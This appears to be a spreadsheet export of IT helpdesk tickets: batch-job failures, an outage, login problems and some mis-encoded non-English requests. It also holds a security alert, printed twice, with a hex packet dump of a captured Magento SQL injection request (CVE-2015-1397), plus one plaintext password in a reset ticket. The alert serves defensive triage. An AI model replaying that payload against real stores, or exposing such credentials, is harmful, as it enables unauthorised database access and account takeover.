    <t xml:space="preserve">why we can't use the outlook groups ? </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: bmudkpie.qolrvbip@gmail.com_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>abend batch job:Job_1391</t>
  </si>
  <si>
    <t>job name:Job_1391</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1391 failed in job_scheduler at: 09/18/2016 10:39:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1391 failed in job_scheduler at: 09/18/2016 10:39:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1314 failed in job_scheduler at: 09/18/2016 09:58:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1314 failed in job_scheduler at: 09/18/2016 09:58:00</t>
  </si>
  <si>
    <t>ooo until 30.9.2016 : engineering_tool</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: wsczgfal.hjfklsdg@gmail.com_x000D_
_x000D_
witam,_x000D_
_x000D_
zgÅ‚aszam kÅ‚opoty z engineering_tool-em_x000D_
_x000D_
[cid:image001.png@01SID_351c2.c943d840]_x000D_
_x000D_
nie moÅ¼na zrobiÄ‡ synchronizacji, brak raportÃ³w itp._x000D_
_x000D_
pozdrawiam/best </t>
  </si>
  <si>
    <t>wsczgfal hjfklsdg</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_34 account locked out and password reset </t>
  </si>
  <si>
    <t>incjpxsq gdxbvaqz</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1348 failed in job_scheduler at: 09/18/2016 08:38:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1348 failed in job_scheduler at: 09/18/2016 08:38:00</t>
  </si>
  <si>
    <t>power outage :south_amerirtca :site is hard down since at 8:19 am et on 09/18.</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ______8:19 am et on 09/18________________x000D_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</si>
  <si>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Job_1368 failed in job_scheduler at: 09/18/2016 08:14:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1368 failed in job_scheduler at: 09/18/2016 08:14:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1382 failed in job_scheduler at: 09/18/2016 08:04:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1382 failed in job_scheduler at: 09/18/2016 08:04:00</t>
  </si>
  <si>
    <t xml:space="preserve">job pp_EU_tool_netch_keheu1 failed in job_scheduler at: 09/18/2016 07:36:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job pp_EU_tool_netch_keheu1 failed in job_scheduler at: 09/18/2016 07:36:00</t>
  </si>
  <si>
    <t>skype login issue : personal certificate issue</t>
  </si>
  <si>
    <t xml:space="preserve">
summary:my skype business cannot login, error message is " there was a problem acquiring personal certificate required to sign in"
please help to solve this. </t>
  </si>
  <si>
    <t>hbodpniz jvqpxohl</t>
  </si>
  <si>
    <t>apac company:  fastethernet0/48 Â· uplink to company-ap-chn-apac-2950-24-access-sw05 is down since 23:31 et on 09/17</t>
  </si>
  <si>
    <t>apac company:  company-ap-chn-apac-shop-closet-2960-access-sw01.company.com  -    fastethernet0/48 Â· uplink to company-ap-chn-apac-2950-24-access-sw05 since 23:31 et on 09/17.</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1384 failed in job_scheduler at: 09/18/2016 07:09:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1384 failed in job_scheduler at: 09/18/2016 07:09:00</t>
  </si>
  <si>
    <t xml:space="preserve">job co_val_update_crosscomp failed in job_scheduler at: 09/18/2016 05:50:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job co_val_update_crosscomp failed in job_scheduler at: 09/18/2016 05:50:00</t>
  </si>
  <si>
    <t>only erp running slow since last 3-4 hours in Israel.internet is working fine.</t>
  </si>
  <si>
    <t xml:space="preserve">only erp running slow since last 3-4 hours. internet is working fine.
all transactions are running slow.
contact # :
erp system : SID_34 (all transactions)
checked with dac team, no issues as such.
dac team checking with utilization now.
dac confirmed that utilization is high since last half an hour. 
calling erp basis on call support : on call support 
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3343 failed in job_scheduler at: 09/18/2016 05:01:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3343 failed in job_scheduler at: 09/18/2016 05:01:00</t>
  </si>
  <si>
    <t>security incidents - ( sw #in33895560 ) : magento sql injection</t>
  </si>
  <si>
    <t>source ip : 172.20.10.37 , 208.211.136.158
system name : whqsm010 , reference.company.com (
user  name: n/a
location : dmz
sep , sms status : 
field sales user ( yes / no) :  
dsw event log: see below
**
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"magento mage_adminhtml_block_widget_grid::getcsvfile() sql injection vulnerability" described in cve-2015-1397.
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
1) autoresolve these alerts directly to the portal (no explicit notification and events will be available for reporting purposes in the portal). this is most likely the best choice if you are not running the application being targeted.
2) ticket only escalation via a medium priority ticket (no phone call) for each unique source ip address for these alerts (this may generate a relatively large volume of incident tickets). 
3) full escalation via a high priority ticket and a phone call for each unique source ip address. 
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
sincerely,
 ctoc
=========================
technical details
=========================
a vulnerability exists in magento due to insufficient input validation within the mage_adminhtml_block_widget_grid::getcsvfile() function. a remote attacker could exploit this vulnerability to conduct sql injection attacks on vulnerable systems.
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
=========================
references
=========================
=========================
event data
=========================
related events: 
event id: 44717197
event summary: 52853 vid68372 possible magento mage_adminhtml_block_widget_gridgetcsvfile() sql injection attempt inbound
occurrence count: 4
event count: 4
host and connection information
source ip: 166.78.155.100
source port: 55334
source ip geolocation: dallas, usa
destination ip: 208.211.136.158
destination port: 80
destination ip geolocation: usa, usa
connection directionality: incoming
protocol: tcp
http method: post
host: www.company.de
full url path: /admin/cms_wysiwyg/directive/index/
device information
device ip: 208.211.136.207
device name: isensplant_247.company.com
log time: 2016-09-17 at 11:35:02 utc
action: not blocked
vendor eventid: 393369
cvss score: 6.5 
vendor priority: 2
vendor version: 7
scwx event processing information
sherlock rule id (sle): 2161562
inspector event id: 63726775
ontology id: 200020003203759378
event type id: 200020003203707850
agent id: 102989
event detail:
[**] [1:21163964:2] 52853 vid68372 possible magento mage_adminhtml_block_widget_gridgetcsvfile() sql injection attempt inbound [**]
[classification: none] [priority: 2] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]
[sensor id: 602981][event id: 393369][time: 2585223213.930745]
[src ip: 166.78.155.100][dst ip: 208.211.136.158][sport/itype: 55334][dport/icode: 80][proto: 6]
09/17/2016-11:35:02.930745 166.78.155.100:55334 -&gt; 208.211.136.158:80
tcp ttl:54 tos:0x0 id:26997 iplen:20 dgmlen:1236 df
***ap*** seq: 0x595823f2 ack: 0x6b4edac2 win: 0xe5 tcplen: 32
tcp options (3) =&gt; nop nop ts: 4341465171 309732804 
==pcap 1==
[ex http_uri 9: /admin/cms_wysiwyg/directive/index/]
[ex http_hostname 10: www.company.de]
[o:security]
ascii packet(s):
==pcap 1 ascii s==
....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
==pcap 1 ascii e==
hex packet(s):
==pcap 1 hex s==
000000 0c00 0000 662a dd57 b933 0e00 d404 0000 ....f*.w.3......
000010 d404 0000 4500 04d4 6975 4000 3606 3b8a ....e...iu@.6.;.
000020 a64e 9b64 d0d3 889e d826 0050 5958 23f2 .n.d.....&amp;.pyx#.
000030 6b4e dac2 8018 00e5 f939 0000 0101 080a kn.......9......
000040 c08b 4a8c 11cc 9b61 504f 5354 202f 6164 ..j....apost./ad
000050 6d69 6e2f 436d 735f 5779 7369 7779 672f min/cms_wysiwyg/
000060 6469 7265 6374 6976 652f 696e 6465 782f directive/index/
000070 2048 5454 502f 312e 310d 0a48 6f73 743a .http/1.1..host:
000080 2077 7777 2e6b 656e 6e61 6d65 7461 6c2e .www.company.
000090 6465 0d0a 4163 6365 7074 3a20 2a2f 2a0d de..accept:.*/*.
0000a0 0a43 6f6e 7465 6e74 2d4c 656e 6774 683a .content-length:
0000b0 2031 3032 320d 0a43 6f6e 7465 6e74 2d54 .1022..content-t
0000c0 7970 653a 2061 7070 6c69 6361 7469 6f6e ype:.application
0000d0 2f78 2d77 7777 2d66 6f72 6d2d 7572 6c65 /x-www-form-urle
0000e0 6e63 6f64 6564 0d0a 0d0a 6669 6c74 6572 ncoded....filter
0000f0 3d63 4739 7764 5778 6863 6d6c 3065 5674 =cg9wdwxhcml0evt
000100 6d63 6d39 7458 5430 774a 6e42 7663 4856 mcm9txt0wjnbvchv
000110 7359 584a 7064 486c 6264 4739 6450 544d syxjpdhlbdg9dptm
000120 6d63 4739 7764 5778 6863 6d6c 3065 5674 mcg9wdwxhcml0evt
000130 6SID_26 5756 735a 4639 6c65 4842 7958 5430 mawvszf9lehbyxt0
000140 774b 5474 5452 5651 6751 464e 4254 4651 wktttrvqgqfnbtfq
000150 6750 5341 6e63 6e41 6e4f 314e 4656 4342 gpsancnano1nfvcb
000160 4155 4546 5455 7941 3949 454e 5054 6b4e aueftuya9ienptkn
000170 4256 4368 4e52 4455 6f51 3039 4f51 3046 bvchnrduoq09oq0f
000180 554b 4342 4155 3046 4d56 4341 7349 4364 ukcbau0fmvcasicd
000190 305a 5731 775a 5773 6e4b 5341 704c 4342 0zw1wzwsnkerplcb
0001a0 4454 3035 4451 5651 6f4a 7a6f 6e4c 4342 dt05dqvqojzonlcb
0001b0 4155 3046 4d56 4341 704b 5474 5452 5578 au0fmvcapktttrux
0001c0 4651 3151 6751 4556 5956 464a 4249 446f fq1qgqevyvfjbido
0001d0 3949 4531 4257 4368 6c65 4852 7959 536b 9ie1bwchlehryysk
0001e0 6752 6c4a 5054 5342 685a 4731 7062 6c39 grljptsbhzg1pbl9
0001f0 3163 3256 7949 4664 4952 564a 4649 4756 1c2vyifdirvjfigv
000200 3464 484a 6849 456c 5449 4535 5056 4342 4dhjhieltie5pvcb
000210 4f56 5578 4d4f 306c 4f55 3056 5356 4342 ovuxmo0lou0vsvcb
000220 4a54 6c52 5049 4742 685a 4731 7062 6c39 jtlrpigbhzg1pbl9
000230 3163 3256 7959 4341 6f59 475a 7063 6e4e 1c2vyycaoygzpcnn
000240 3062 6d46 745a 5741 7349 4742 7359 584e 0bmftzwasigbsyxn
000250 3062 6d46 745a 5741 7359 4756 7459 576c 0bmftzwasygvtywl
000260 7359 4378 6764 584e 6c63 6d35 6862 5756 sycxgdxnlcm5hbwv
000270 674c 4742 7759 584e 7a64 3239 795a 4741 glgbwyxnzd29yzga
000280 7359 474e 795a 5746 305a 5752 674c 4742 sygnyzwf0zwrglgb
000290 7362 3264 7564 5731 674c 4742 795a 5778 sb2dudfrtglgbyzwx
0002a0 7659 5752 6659 574e 7358 325a 7359 5764 vywrfywnsx2zsywd
0002b0 674c 4742 7063 3139 6859 3352 7064 6d56 glgbpc19hy3rpdmv
0002c0 674c 4742 6c65 4852 7959 5741 7359 484a glgblehryywasyhj
0002d0 7758 3352 7661 3256 7559 4378 6763 6e42 wx3rva2vuycxgcnb
0002e0 6664 4739 725a 5735 6659 334a 6c59 5852 fdg9rzw5fy3jlyxr
0002f0 6c5a 4639 6864 4741 7049 465a 4254 4656 lzf9hdgapifzbtfv
000300 4655 7941 6f4a 305a 7063 6e4e 3062 6d46 fuyaoj0zpcnn0bmf
000310 745a 5363 734a 3078 6863 3352 7559 5731 tzscsj0xhc3ruyw1
000320 6c4a 7977 6e63 3256 6a64 584a 7064 486c ljywnc2vjdxjpdhl
000330 4162 5746 6e5a 5735 3062 324e 7662 5731 abwfnzw50b2nvbw1
000340 6c63 6d4e 6c4c 6d4e 7662 5363 734a 3342 lcmnllmnvbscsj3b
000350 7662 476c 6a65 5363 7351 4642 4255 314d vbgljescsqfbbu1m
000360 7354 6b39 584b 436b 734d 4377 774c 4445 stk9xkcksmcwwlde
000370 7351 4556 5956 464a 424c 4535 5654 4577 sqevyvfjble5vtew
000380 7349 4535 5056 7967 704b 5474 4a54 6c4e sie5pvygpkttjtln
000390 4655 6c51 6753 5535 5554 7942 6759 5752 fulqgsu5utybgywr
0003a0 7461 5735 6663 6d39 735a 5741 674b 4842 taw5fcm9szwagkhb
0003b0 6863 6d56 7564 4639 705a 4378 3063 6d56 hcmvudf9pzcx0cmv
0003c0 6c58 3278 6c64 6d56 734c 484e 7663 6e52 lx2xldmvslhnvcnr
0003d0 6662 334a 6b5a 5849 7363 6d39 735a 5639 fb3jkzxisupply_chain9szv9
0003e0 3065 5842 6c4c 4856 7a5a 584a 6661 5751 0exbllhvzzxjfawq
0003f0 7363 6d39 735a 5639 7559 5731 6c4b 5342 supply_chain9szv9uyw1lksb
000400 5751 5578 5652 564d 674b 4445 734d 6977 wquxvrvmgkdesmiw
000410 774c 4364 564a 7977 6f55 3056 4d52 554e wlcdvjywou0vmrun
000420 5549 4856 7a5a 584a 6661 5751 6752 6c4a uihvzzxjfawqgrlj
000430 5054 5342 685a 4731 7062 6c39 3163 3256 ptsbhzg1pbl91c2v
000440 7949 4664 4952 564a 4649 4856 7a5a 584a yifdirvjfihvzzxj
000450 7559 5731 6c49 4430 674a 3342 7662 476c uyw1lid0gj3bvbgl
000460 6a65 5363 704c 4364 4761 584a 7a64 4735 jescplcdgaxjzdg5
000470 6862 5755 6e4b 5473 3d26 5f5f 5f64 6972 hbwunkts=&amp;___dir
000480 6563 7469 7665 3d65 3374 6962 4739 6a61 ective=e3tibg9ja
000490 7942 3065 5842 6c50 5546 6b62 576c 7561 yb0exblpufkbwlua
0004a0 4852 7462 4339 795a 5842 7663 6e52 6663 hrtbc9yzxbvcnrfc
0004b0 3256 6863 6d4e 6f58 3264 7961 5751 6762 2vhcmnox2dyawqgb
0004c0 3356 3063 4856 3050 5764 6c64 454e 7a64 3v0chv0pwdldenzd
0004d0 6b5a 7062 4756 3966 513d 3d26 666f 7277 kzpbgv9fq==&amp;forw
0004e0 6172 6465 643d 3126 arded=1&amp;
==pcap 1 hex e==
[[3 of 4 events not shown due to space constraints]]
take action
ticket action:</t>
  </si>
  <si>
    <t>can not post dn#9169336870 under rma#6001502124</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: wktesmbp.lorjymef@gmail.com
dear team,
pls. help to check below issue~
return dn#9169336870 can not be posted due to bath issue,but we can not key in anything in batch blank.
pls. help to handle it,thx a lot!
[cid:image001.png@01SID_351bc.f1978a90]
[cid:image002.jpg@01SID_351bc.f1978a90]
b.rgds
judthtihty.zhuyhts
company hardpoint apac-wgq dc
</t>
  </si>
  <si>
    <t>source ip : 172.20.10.37 , 208.211.136.158
system name : whqsm010 , reference.company.com (
user  name: n/a
location : dmz
sep , sms status : 
field sales user ( yes / no) :  
dsw event log: see below
**
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"magento mage_adminhtml_block_widget_grid::getcsvfile() sql injection vulnerability" described in cve-2015-1397.
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
1) autoresolve these alerts directly to the portal (no explicit notification and events will be available for reporting purposes in the portal). this is most likely the best choice if you are not running the application being targeted.
2) ticket only escalation via a medium priority ticket (no phone call) for each unique source ip address for these alerts (this may generate a relatively large volume of incident tickets). 
3) full escalation via a high priority ticket and a phone call for each unique source ip address. 
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
sincerely,
 ctoc
=========================
technical details
=========================
a vulnerability exists in magento due to insufficient input validation within the mage_adminhtml_block_widget_grid::getcsvfile() function. a remote attacker could exploit this vulnerability to conduct sql injection attacks on vulnerable systems.
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
=========================
references
=========================
=========================
event data
=========================
related events: 
event id: 44717197
event summary: 52853 vid68372 possible magento mage_adminhtml_block_widget_gridgetcsvfile() sql injection attempt inbound
occurrence count: 4
event count: 4
host and connection information
source ip: 166.78.155.100
source port: 55334
source ip geolocation: dallas, usa
destination ip: 208.211.136.158
destination port: 80
destination ip geolocation: usa, usa
connection directionality: incoming
protocol: tcp
http method: post
host: www.company.de
full url path: /admin/cms_wysiwyg/directive/index/
device information
device ip: 208.211.136.207
device name: isensplant_247.company.com
log time: 2016-09-17 at 11:35:02 utc
action: not blocked
vendor eventid: 393369
cvss score: 6.5 
vendor priority: 2
vendor version: 7
scwx event processing information
sherlock rule id (sle): 2161562
inspector event id: 63726775
ontology id: 200020003203759378
event type id: 200020003203707850
agent id: 102989
event detail:
[**] [1:21163964:2] 52853 vid68372 possible magento mage_adminhtml_block_widget_gridgetcsvfile() sql injection attempt inbound [**]
[classification: none] [priority: 2] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]
[sensor id: 602981][event id: 393369][time: 2585223213.930745]
[src ip: 166.78.155.100][dst ip: 208.211.136.158][sport/itype: 55334][dport/icode: 80][proto: 6]
09/17/2016-11:35:02.930745 166.78.155.100:55334 -&gt; 208.211.136.158:80
tcp ttl:54 tos:0x0 id:26997 iplen:20 dgmlen:1236 df
***ap*** seq: 0x595823f2 ack: 0x6b4edac2 win: 0xe5 tcplen: 32
tcp options (3) =&gt; nop nop ts: 4341465171 309732804 
==pcap 1==
[ex http_uri 9: /admin/cms_wysiwyg/directive/index/]
[ex http_hostname 10: www.company.de]
[o:security]
ascii packet(s):
==pcap 1 ascii s==
....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
==pcap 1 ascii e==
hex packet(s):
==pcap 1 hex s==
000000 0c00 0000 662a dd57 b933 0e00 d404 0000 ....f*.w.3......
000010 d404 0000 4500 04d4 6975 4000 3606 3b8a ....e...iu@.6.;.
000020 a64e 9b64 d0d3 889e d826 0050 5958 23f2 .n.d.....&amp;.pyx#.
000030 6b4e dac2 8018 00e5 f939 0000 0101 080a kn.......9......
000040 c08b 4a8c 11cc 9b61 504f 5354 202f 6164 ..j....apost./ad
000050 6d69 6e2f 436d 735f 5779 7369 7779 672f min/cms_wysiwyg/
000060 6469 7265 6374 6976 652f 696e 6465 782f directive/index/
000070 2048 5454 502f 312e 310d 0a48 6f73 743a .http/1.1..host:
000080 2077 7777 2e6b 656e 6e61 6d65 7461 6c2e .www.company.
000090 6465 0d0a 4163 6365 7074 3a20 2a2f 2a0d de..accept:.*/*.
0000a0 0a43 6f6e 7465 6e74 2d4c 656e 6774 683a .content-length:
0000b0 2031 3032 320d 0a43 6f6e 7465 6e74 2d54 .1022..content-t
0000c0 7970 653a 2061 7070 6c69 6361 7469 6f6e ype:.application
0000d0 2f78 2d77 7777 2d66 6f72 6d2d 7572 6c65 /x-www-form-urle
0000e0 6e63 6f64 6564 0d0a 0d0a 6669 6c74 6572 ncoded....filter
0000f0 3d63 4739 7764 5778 6863 6d6c 3065 5674 =cg9wdwxhcml0evt
000100 6d63 6d39 7458 5430 774a 6e42 7663 4856 mcm9txt0wjnbvchv
000110 7359 584a 7064 486c 6264 4739 6450 544d syxjpdhlbdg9dptm
000120 6d63 4739 7764 5778 6863 6d6c 3065 5674 mcg9wdwxhcml0evt
000130 6SID_26 5756 735a 4639 6c65 4842 7958 5430 mawvszf9lehbyxt0
000140 774b 5474 5452 5651 6751 464e 4254 4651 wktttrvqgqfnbtfq
000150 6750 5341 6e63 6e41 6e4f 314e 4656 4342 gpsancnano1nfvcb
000160 4155 4546 5455 7941 3949 454e 5054 6b4e aueftuya9ienptkn
000170 4256 4368 4e52 4455 6f51 3039 4f51 3046 bvchnrduoq09oq0f
000180 554b 4342 4155 3046 4d56 4341 7349 4364 ukcbau0fmvcasicd
000190 305a 5731 775a 5773 6e4b 5341 704c 4342 0zw1wzwsnkerplcb
0001a0 4454 3035 4451 5651 6f4a 7a6f 6e4c 4342 dt05dqvqojzonlcb
0001b0 4155 3046 4d56 4341 704b 5474 5452 5578 au0fmvcapktttrux
0001c0 4651 3151 6751 4556 5956 464a 4249 446f fq1qgqevyvfjbido
0001d0 3949 4531 4257 4368 6c65 4852 7959 536b 9ie1bwchlehryysk
0001e0 6752 6c4a 5054 5342 685a 4731 7062 6c39 grljptsbhzg1pbl9
0001f0 3163 3256 7949 4664 4952 564a 4649 4756 1c2vyifdirvjfigv
000200 3464 484a 6849 456c 5449 4535 5056 4342 4dhjhieltie5pvcb
000210 4f56 5578 4d4f 306c 4f55 3056 5356 4342 ovuxmo0lou0vsvcb
000220 4a54 6c52 5049 4742 685a 4731 7062 6c39 jtlrpigbhzg1pbl9
000230 3163 3256 7959 4341 6f59 475a 7063 6e4e 1c2vyycaoygzpcnn
000240 3062 6d46 745a 5741 7349 4742 7359 584e 0bmftzwasigbsyxn
000250 3062 6d46 745a 5741 7359 4756 7459 576c 0bmftzwasygvtywl
000260 7359 4378 6764 584e 6c63 6d35 6862 5756 sycxgdxnlcm5hbwv
000270 674c 4742 7759 584e 7a64 3239 795a 4741 glgbwyxnzd29yzga
000280 7359 474e 795a 5746 305a 5752 674c 4742 sygnyzwf0zwrglgb
000290 7362 3264 7564 5731 674c 4742 795a 5778 sb2dudfrtglgbyzwx
0002a0 7659 5752 6659 574e 7358 325a 7359 5764 vywrfywnsx2zsywd
0002b0 674c 4742 7063 3139 6859 3352 7064 6d56 glgbpc19hy3rpdmv
0002c0 674c 4742 6c65 4852 7959 5741 7359 484a glgblehryywasyhj
0002d0 7758 3352 7661 3256 7559 4378 6763 6e42 wx3rva2vuycxgcnb
0002e0 6664 4739 725a 5735 6659 334a 6c59 5852 fdg9rzw5fy3jlyxr
0002f0 6c5a 4639 6864 4741 7049 465a 4254 4656 lzf9hdgapifzbtfv
000300 4655 7941 6f4a 305a 7063 6e4e 3062 6d46 fuyaoj0zpcnn0bmf
000310 745a 5363 734a 3078 6863 3352 7559 5731 tzscsj0xhc3ruyw1
000320 6c4a 7977 6e63 3256 6a64 584a 7064 486c ljywnc2vjdxjpdhl
000330 4162 5746 6e5a 5735 3062 324e 7662 5731 abwfnzw50b2nvbw1
000340 6c63 6d4e 6c4c 6d4e 7662 5363 734a 3342 lcmnllmnvbscsj3b
000350 7662 476c 6a65 5363 7351 4642 4255 314d vbgljescsqfbbu1m
000360 7354 6b39 584b 436b 734d 4377 774c 4445 stk9xkcksmcwwlde
000370 7351 4556 5956 464a 424c 4535 5654 4577 sqevyvfjble5vtew
000380 7349 4535 5056 7967 704b 5474 4a54 6c4e sie5pvygpkttjtln
000390 4655 6c51 6753 5535 5554 7942 6759 5752 fulqgsu5utybgywr
0003a0 7461 5735 6663 6d39 735a 5741 674b 4842 taw5fcm9szwagkhb
0003b0 6863 6d56 7564 4639 705a 4378 3063 6d56 hcmvudf9pzcx0cmv
0003c0 6c58 3278 6c64 6d56 734c 484e 7663 6e52 lx2xldmvslhnvcnr
0003d0 6662 334a 6b5a 5849 7363 6d39 735a 5639 fb3jkzxisupply_chain9szv9
0003e0 3065 5842 6c4c 4856 7a5a 584a 6661 5751 0exbllhvzzxjfawq
0003f0 7363 6d39 735a 5639 7559 5731 6c4b 5342 supply_chain9szv9uyw1lksb
000400 5751 5578 5652 564d 674b 4445 734d 6977 wquxvrvmgkdesmiw
000410 774c 4364 564a 7977 6f55 3056 4d52 554e wlcdvjywou0vmrun
000420 5549 4856 7a5a 584a 6661 5751 6752 6c4a uihvzzxjfawqgrlj
000430 5054 5342 685a 4731 7062 6c39 3163 3256 ptsbhzg1pbl91c2v
000440 7949 4664 4952 564a 4649 4856 7a5a 584a yifdirvjfihvzzxj
000450 7559 5731 6c49 4430 674a 3342 7662 476c uyw1lid0gj3bvbgl
000460 6a65 5363 704c 4364 4761 584a 7a64 4735 jescplcdgaxjzdg5
000470 6862 5755 6e4b 5473 3d26 5f5f 5f64 6972 hbwunkts=&amp;___dir
000480 6563 7469 7665 3d65 3374 6962 4739 6a61 ective=e3tibg9ja
000490 7942 3065 5842 6c50 5546 6b62 576c 7561 yb0exblpufkbwlua
0004a0 4852 7462 4339 795a 5842 7663 6e52 6663 hrtbc9yzxbvcnrfc
0004b0 3256 6863 6d4e 6f58 3264 7961 5751 6762 2vhcmnox2dyawqgb
0004c0 3356 3063 4856 3050 5764 6c64 454e 7a64 3v0chv0pwdldenzd
0004d0 6b5a 7062 4756 3966 513d 3d26 666f 7277 kzpbgv9fq==&amp;forw
0004e0 6172 6465 643d 3126 arded=1&amp;
==pcap 1 hex e==
[[3 of 4 events not shown due to space constraints]]
take action
ticket action:</t>
  </si>
  <si>
    <t>çƒ­åŽ‹ç‚‰4å·plcæŽ§åˆ¶å™¨é€šè®¯æ¨¡å—ç½‘ç»œåœ°å€ä¸¢å¤±</t>
  </si>
  <si>
    <t>ä»Šå¹´å‘ç”Ÿäº†5æ¬¡ç½‘ç»œåœ°å€ä¸¢å¤±ï¼Œéœ€è¦é‡å¯è®¾å¤‡åŽï¼Œæ‰èƒ½é‡æ–°æ¢å¤ï¼Œåœ¨å…¶ä»–è®¾å¤‡ä¸Šæ— æ­¤æ•…éšœã€‚æ˜¯å¦ç»‘å®šipåœ°å€ï¼Ÿ</t>
  </si>
  <si>
    <t>pwfirvgu ydwlhuzi</t>
  </si>
  <si>
    <t>reset passwords for hgyvopct dhckfmbq using password_management_tool password reset.</t>
  </si>
  <si>
    <t>è¯·å°†å¯†ç è®¾ç½®ä¸ºï¼šsdguo1609</t>
  </si>
  <si>
    <t>hgyvopct dhckfmbq</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2883 failed in job_scheduler at: 09/18/2016 00:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2883 failed in job_scheduler at: 09/18/2016 00:02:00</t>
  </si>
  <si>
    <t xml:space="preserve">job bwdpmbkp failed in job_scheduler at: 09/18/2016 00:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bwdpmbkp failed in job_scheduler at: 09/18/2016 00:02:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1321 failed in job_scheduler at: 09/17/2016 23:51:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1321 failed in job_scheduler at: 09/17/2016 23:51:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2883 failed in job_scheduler at: 09/17/2016 23:11:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2883 failed in job_scheduler at: 09/17/2016 23:11:00</t>
  </si>
  <si>
    <t>awsqjfkm dejmuhlg</t>
  </si>
  <si>
    <t>ç”µè„‘æ„å¤–è¿›æ°´ï¼Œå¸®åŠ©å¤„ç†ï¼è¯·äº¤å°è´ºï¼Œè°¢è°¢</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_370 failed in job_scheduler at: 09/17/2016 22:11:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_370 failed in job_scheduler at: 09/17/2016 22:11:00</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: rujpckto.lhutkpxm@gmail.com
help team
today is chinese working day. can you open erp system aerp?
rujpckto lhutkpxm(æœ±å®)
materials manager
company (apac) co., ltd.
</t>
  </si>
  <si>
    <t>rujpckto lhutkpxm</t>
  </si>
  <si>
    <t>alwaysupservice.exe is not running in many plm conversion servers</t>
  </si>
  <si>
    <t>HostName_107; HostName_108; HostName_521; HostName_520; HostName_986 : alwaysupservice.exe is not running</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_567 failed in job_scheduler at: 09/17/2016 20:33:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_567 failed in job_scheduler at: 09/17/2016 20:33:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1391 failed in job_scheduler at: 09/17/2016 18:25:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1391 failed in job_scheduler at: 09/17/2016 18:25:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1665 failed in job_scheduler at: 09/17/2016 18:25:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1665 failed in job_scheduler at: 09/17/2016 18:25:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1336 failed in job_scheduler at: 09/17/2016 17:43:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1336 failed in job_scheduler at: 09/17/2016 17:43:00</t>
  </si>
  <si>
    <t xml:space="preserve">job bwdpmbkp failed in job_scheduler at: 09/17/2016 14:48:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bwdpmbkp failed in job_scheduler at: 09/17/2016 14:48:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3194 failed in job_scheduler at: 09/17/2016 14:10:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3194 failed in job_scheduler at: 09/17/2016 14:10:00</t>
  </si>
  <si>
    <t>received call from , music was playing but no one was awswering.</t>
  </si>
  <si>
    <t>received call  music was playing but no one was answering._x000D_
_x000D_
 interaction id : 2064305748</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1429 failed in job_scheduler at: 09/17/2016 11:43:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1429 failed in job_scheduler at: 09/17/2016 11:43:00</t>
  </si>
  <si>
    <t xml:space="preserve">job bkwin_ms_cluster_full failed in job_scheduler at: 09/17/2016 11:16:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkwin_ms_cluster_full failed in job_scheduler at: 09/17/2016 11:16:00</t>
  </si>
  <si>
